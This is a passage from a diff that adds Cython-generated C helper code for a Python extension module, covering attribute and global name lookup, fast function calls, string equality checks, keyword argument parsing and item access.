__Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* PyObjectSetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE int __Pyx_PyObject_SetAttrStr(PyObject* obj, PyObject* attr_name, PyObject* value) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_setattro)) + return tp->tp_setattro(obj, attr_name, value); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_setattr)) + return tp->tp_setattr(obj, PyString_AS_STRING(attr_name), value); +#endif + return PyObject_SetAttr(obj, attr_name, value); +} +#endif + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && 